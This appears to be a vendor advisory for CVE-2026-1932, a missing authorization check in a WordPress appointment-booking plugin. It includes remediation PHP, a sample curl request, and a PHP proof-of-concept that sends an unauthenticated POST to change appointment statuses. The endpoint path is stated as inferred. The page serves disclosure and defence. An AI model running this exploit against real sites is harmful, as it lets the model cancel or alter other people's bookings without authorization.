Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1932: Appointment Booking Calendar Plugin <= 1.0.2 – Missing Authorization to Unauthenticated Arbitrary Appointment Status Modification (bookr)

CVE ID: CVE-2026-1932
Plugin: bookr
Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 1.0.2
Patched Version:
Disclosed: February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1932 (metadata-based):
This vulnerability allows unauthenticated attackers to modify the status of any appointment in the Appointment Booking Calendar Plugin – Bookr for WordPress versions up to and including 1.0.2. The issue resides in the plugin’s REST API endpoint handling, specifically the update-appointment endpoint. The CVSS score of 5.3 (Medium) reflects the network accessibility, low attack complexity, and integrity impact without confidentiality or availability loss.

Atomic Edge research identifies the root cause as a missing capability check (CWE-862) on the update-appointment REST API endpoint. The vulnerability description confirms the absence of an authorization mechanism. Without source code, we infer the endpoint likely uses the WordPress REST API infrastructure, registers a route without proper permission_callback, and directly processes user-supplied parameters. This inference aligns with the CWE classification and common WordPress plugin patterns where REST endpoints omit the permission_callback parameter in register_rest_route().

Exploitation requires sending an HTTP request to the vulnerable REST endpoint. The attacker crafts a POST or PUT request to /wp-json/bookr/v1/update-appointment (the exact namespace is inferred from plugin slug conventions). The payload includes parameters like appointment_id and status. No authentication headers or cookies are needed. A sample request uses curl -X POST https://target.site/wp-json/bookr/v1/update-appointment -d 'appointment_id=123&status=cancelled'. Attackers can enumerate appointment IDs or intercept legitimate appointment IDs from public pages.

Remediation requires implementing proper authorization checks. The plugin must add a permission_callback function to the register_rest_route() call for the update-appointment endpoint. This callback should verify the user has appropriate capabilities (like manage_options or a custom appointment_management capability). The fix should also validate the current user’s permissions against the target appointment’s ownership or administrative rights. WordPress REST API best practices mandate permission_callback for all routes modifying data.
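The following is an added example, not the Bookr plugin's own code (which is not shown on this page): a route registration that implements the remediation above, supplying the permission_callback the root-cause analysis infers to be missing, checking capability or appointment ownership, and validating the two parameters. The namespace, the custom capability bookr_manage_appointments, the post-meta keys, the status set and the bookr_example_* helpers are all assumptions.

```php
<?php
// Added example, not the plugin's code: the hardened route registration the
// remediation describes. Namespace, capability, meta keys and helpers are assumed.

// Assumed lookup of the customer (user ID) who owns an appointment.
function bookr_example_appointment_owner( int $appointment_id ): ?int {
    $owner = get_post_meta( $appointment_id, '_bookr_customer_id', true ); // assumed key
    return ( $owner === '' || $owner === false ) ? null : (int) $owner;
}

// permission_callback: the check the vulnerable version is inferred to lack.
// Unauthenticated -> 401; admins / assumed custom capability -> allowed;
// a logged-in customer -> only their own appointment; anyone else -> 403.
function bookr_example_can_update_appointment( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_unauthorized', 'Login required.', array( 'status' => 401 ) );
    }
    if ( current_user_can( 'manage_options' ) || current_user_can( 'bookr_manage_appointments' ) ) {
        return true;
    }
    $owner = bookr_example_appointment_owner( (int) $request->get_param( 'appointment_id' ) );
    if ( null !== $owner && $owner === get_current_user_id() ) {
        return true;
    }
    return new WP_Error( 'rest_forbidden', 'Not your appointment.', array( 'status' => 403 ) );
}

// Handler runs only after the permission_callback and arg validation pass.
function bookr_example_update_appointment( WP_REST_Request $request ) {
    $id     = (int) $request->get_param( 'appointment_id' );
    $status = sanitize_key( $request->get_param( 'status' ) );
    update_post_meta( $id, '_bookr_status', $status ); // assumed storage
    return rest_ensure_response( array( 'appointment_id' => $id, 'status' => $status ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'bookr/v1', '/update-appointment', array(
        'methods'             => WP_REST_Server::EDITABLE, // POST, PUT, PATCH
        'callback'            => 'bookr_example_update_appointment',
        'permission_callback' => 'bookr_example_can_update_appointment', // never omit this
        'args'                => array(
            'appointment_id' => array( 'required' => true, 'type' => 'integer', 'sanitize_callback' => 'absint' ),
            'status'         => array(
                'required' => true,
                'type'     => 'string',
                'enum'     => array( 'pending', 'confirmed', 'cancelled' ), // assumed status set
            ),
        ),
    ) );
} );
```

With this registration in place, the unauthenticated request the PoC below sends receives a 401 from the permission_callback before the handler runs, and a request with a status outside the enum is rejected by argument validation.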

The impact is unauthorized modification of appointment statuses. Attackers can cancel, confirm, or reschedule appointments, disrupting business operations, causing financial loss, and damaging trust. While the vulnerability does not permit data theft or full system compromise, it enables denial-of-service against the booking system. Malicious actors could mass-cancel appointments or create confusion by altering statuses. The integrity impact is direct, with potential secondary impacts on service delivery and reputation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1932 - Appointment Booking Calendar Plugin <= 1.0.2 - Missing Authorization to Unauthenticated Arbitrary Appointment Status Modification

/**
 * Proof of Concept for CVE-2026-1932
 * Assumptions based on vulnerability description and WordPress REST API patterns:
 * 1. The plugin registers a REST route at a path containing 'update-appointment'
 * 2. The endpoint accepts POST or PUT requests
 * 3. The endpoint expects at least 'appointment_id' and 'status' parameters
 * 4. No authentication or nonce is required
 * The exact namespace (/bookr/v1/) is inferred from common plugin slug conventions.
 */

$target_url = 'https://example.com'; // CHANGE THIS
$endpoint = '/wp-json/bookr/v1/update-appointment'; // Inferred REST path
$appointment_id = 1; // Target appointment ID
$new_status = 'cancelled'; // Status to set

$url = $target_url . $endpoint;

$data = array(
    'appointment_id' => $appointment_id,
    'status' => $new_status
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// No authentication headers or cookies set
$response = curl_exec($ch);
if ($response === false) {
    // Transport-level failure (DNS, TLS, connection refused): report and stop
    echo "curl error: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_code\n";
echo "Response: $response\n";

if ($http_code == 200) {
    echo "[+] Appointment status likely modified.\n";
} else {
    echo "[-] Exploit may have failed or endpoint path differs.\n";
}
?>
